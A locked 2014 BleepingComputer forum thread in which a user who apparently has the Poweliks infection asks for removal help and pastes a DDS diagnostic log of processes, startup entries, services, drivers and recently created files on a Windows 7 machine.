Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Looks like you may have the Poweliks infection


  • This topic is locked This topic is locked
10 replies to this topic

#1 jmantowin

jmantowin

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 31 October 2014 - 02:13 PM

I was told to post here after running a few diagnostics to identify a malware/bot on my machine.

I need help removing it, please.

 

This is the URL for that topic.

 

http://www.bleepingcomputer.com/forums/t/553375/multiple-instances-of-com-surrogatedllhostexe-32/

 

Will be glad to supply any additional info beyond what is there.

 

THANKS!

 

Jman

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17344  BrowserJavaVersion: 10.71.2
Run by JoseAlcazar at 15:05:43 on 2014-10-31
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12249.8061 [GMT -4:00]
.
AV: Norton Security Suite *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Security Suite *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Security Suite *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
c:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe
C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\sftservice.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Winamp\winampa.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\TOASTER.EXE
C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\My Dell\uaclauncher.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.yahoo.com/
mWinlogon: Userinit = userinit.exe,
BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\ips\ipsbho.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: CIESpeechBHO Class: {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coieplg.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
uRun: [DellSystemDetect] C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [ShwiconXP9106] C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
mRun: [Dell DataSafe Online] C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [AdobeCS4ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
mRun: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
mRun: [Adobe_ID0ENQBO] C:\PROGRA~2\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
mRun: [WinampAgent] "C:\Program Files (x86)\Winamp\winampa.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
mRun: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert link target to existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {7815BE26-237D-41A8-A98F-F7BD75F71086} - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: dell.com
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://qtinstall.apple.com/qtactivex/qtplugin.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{4D57ED45-85E6-4BFE-842C-1145A7FAE3DC} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{5AEF1F42-0024-46E6-A692-C4CC74DF0891} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coieplg.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coieplg.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} -
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4
x64-Run: [Nvtmru] "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
x64-Run: [ShadowPlay] C:\Windows\System32\rundll32.exe C:\Windows\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [AtherosBtStack] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe"
x64-Run: [AthBtTray] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe"
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2012-9-26 16152]
R0 nvpciflt;nvpciflt;C:\Windows\System32\drivers\nvpciflt.sys [2014-8-19 32544]
R0 SymDS;Symantec Data Store;C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys [2014-10-16 493656]
R0 SymEFA;Symantec Extended File Attributes;C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys [2014-10-16 1148120]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [2014-10-27 1587416]
R1 ccSet_N360;N360 Settings Manager;C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys [2014-10-16 162392]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141030.001\IDSviA64.sys [2014-10-30 633560]
R1 SymIRON;Symantec Iron Driver;C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys [2014-10-16 266968]
R1 SymNetS;Symantec Network Security WFP Driver;C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys [2014-10-16 593112]
R2 AERTFilters;Andrea RT Filters Service;C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [2012-9-26 98208]
R2 AtherosSvc;AtherosSvc;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe [2012-12-27 204928]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2012-9-26 13592]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-1-10 627936]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-10-28 1871160]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-10-28 968504]
R2 N360;Norton Security Suite;C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe [2014-10-16 265040]
R2 NOBU;Dell DataSafe Online;C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe [2010-8-25 2823000]
R2 NvNetworkService;NVIDIA Network Service;C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2013-12-9 1370912]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [2013-12-9 15128352]
R2 SftService;SoftThinks Agent Service;C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe [2012-9-26 1695040]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2014-9-12 411936]
R2 UNS;Intel® Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2012-9-26 363800]
R2 ZAtheros Bt and Wlan Coex Agent;ZAtheros Bt and Wlan Coex Agent;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [2012-12-27 327296]
R2 ZAtheros Wlan Agent;ZAtheros Wlan Agent;C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [2014-10-25 81536]
R3 AthBTPort;Atheros Virtual Bluetooth Class;C:\Windows\System32\drivers\btath_flt.sys [2012-12-27 36480]
R3 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE [2014-3-11 247968]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;C:\Windows\System32\drivers\btath_a2dp.sys [2012-12-27 341120]
R3 btath_avdt;Atheros Bluetooth AVDT Service;C:\Windows\System32\drivers\btath_avdt.sys [2012-12-27 111232]
R3 BTATH_BUS;Atheros Bluetooth Bus;C:\Windows\System32\drivers\btath_bus.sys [2012-12-27 30848]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;C:\Windows\System32\drivers\btath_hcrp.sys [2012-12-27 168064]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;C:\Windows\System32\drivers\btath_lwflt.sys [2012-12-27 68736]
R3 BTATH_RCP;Bluetooth AVRCP Device;C:\Windows\System32\drivers\btath_rcp.sys [2012-12-27 281728]
R3 BtFilter;BtFilter;C:\Windows\System32\drivers\btfilter.sys [2012-12-27 551552]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-9-12 142640]
R3 IntcDAud;Intel® Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2012-9-26 331264]
R3 iusb3hub;Intel® USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2012-9-26 356120]
R3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2012-9-26 787736]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2014-10-28 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2014-10-28 129752]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2014-10-28 63704]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\Windows\System32\drivers\nvvad64v.sys [2013-12-9 39200]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-9-26 648808]
S2 BBSvc;BingBar Service;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE [2014-3-11 193696]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 DellDigitalDelivery;Dell Digital Delivery Service;C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [2012-8-2 173056]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 Adobe Version Cue CS4;Adobe Version Cue CS4;C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [2008-8-15 284016]
S3 FLEXnet Licensing Service 64;FLEXnet Licensing Service 64;C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe [2012-9-30 1038088]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-10-16 111616]
S3 mbamchameleon;mbamchameleon;C:\Windows\System32\drivers\mbamchameleon.sys [2014-10-28 93400]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-2-2 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-8-24 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2013-2-2 30208]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-9-30 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2008-5-6 14464]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
ShellExec: dreamweaver.exe: Open="C:\Program Files (x86)\Adobe\Adobe Dreamweaver CS4\dreamweaver.exe", "%1"
.
=============== Created Last 30 ================
.
2014-10-30 20:56:28 -------- d-----w- C:\Program Files (x86)\ESET
2014-10-30 20:37:02 -------- d-----w- C:\Windows\ERUNT
2014-10-30 20:26:37 536576 ----a-w- C:\Windows\SysWow64\sqlite3.dll
2014-10-30 20:26:09 -------- d-----w- C:\AdwCleaner
2014-10-28 23:42:21 -------- d-----w- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-28 23:18:03 129752 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-28 23:17:50 93400 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-28 23:17:50 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-28 23:17:50 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-10-28 23:17:50 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-25 23:25:07 -------- d-----w- C:\ProgramData\Atheros
2014-10-25 23:20:34 -------- d-----w- C:\Users\JoseAlcazar\AppData\Roaming\Atheros
2014-10-25 23:20:29 -------- d-----w- C:\Program Files (x86)\Common Files\Atheros
2014-10-25 23:19:14 439296 ----a-w- C:\Windows\System32\athihvs.dll
2014-10-25 23:07:30 -------- d-----w- C:\Users\JoseAlcazar\AppData\Roaming\Dell
2014-10-25 23:07:17 -------- d-----w- C:\ProgramData\PC-Doctor for Windows
2014-10-25 23:07:08 -------- d-----w- C:\Program Files\My Dell
2014-10-25 23:06:40 -------- d-----w- C:\Program Files\Dell Support Center
2014-10-25 23:06:33 -------- d-----w- C:\ProgramData\PCDr
2014-10-25 23:05:39 -------- d-----w- C:\Users\JoseAlcazar\AppData\Roaming\PCDr
2014-10-25 23:03:11 -------- d-----w- C:\Users\JoseAlcazar\AppData\Local\Deployment
2014-10-25 23:03:11 -------- d-----w- C:\Users\JoseAlcazar\AppData\Local\Apps
2014-10-24 20:37:49 -------- d--h--w- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-17 22:42:33 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-10-17 22:18:29 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-10-16 15:37:58 -------- d-sh--w- C:\Users\JoseAlcazar\AppData\Local\EmieUserList
2014-10-16 15:37:58 -------- d-sh--w- C:\Users\JoseAlcazar\AppData\Local\EmieSiteList
2014-10-16 15:05:53 7168 ----a-w- C:\Windows\SysWow64\KBDYAK.DLL
2014-10-16 14:06:17 876248 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtsp64.sys
2014-10-16 14:06:17 593112 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys
2014-10-16 14:06:17 493656 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys
2014-10-16 14:06:17 37592 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtspx64.sys
2014-10-16 14:06:17 23568 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symelam.sys
2014-10-16 14:06:17 1148120 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys
2014-10-16 14:06:16 266968 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys
2014-10-16 14:06:16 162392 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys
2014-10-16 14:06:10 -------- d-----w- C:\Windows\System32\drivers\N360x64\1506000.020
2014-10-14 21:52:59 693176 ----a-w- C:\Windows\System32\winload.efi
.
==================== Find3M  ====================
.
2014-10-02 23:28:47 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-10-02 23:28:47 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-09-29 00:58:48 3198976 ----a-w- C:\Windows\System32\win32k.sys
2014-09-25 02:08:38 371712 ----a-w- C:\Windows\System32\qdvd.dll
2014-09-25 01:40:50 519680 ----a-w- C:\Windows\SysWow64\qdvd.dll
2014-09-18 02:00:42 3241472 ----a-w- C:\Windows\System32\msi.dll
2014-09-18 01:32:52 2363904 ----a-w- C:\Windows\SysWow64\msi.dll
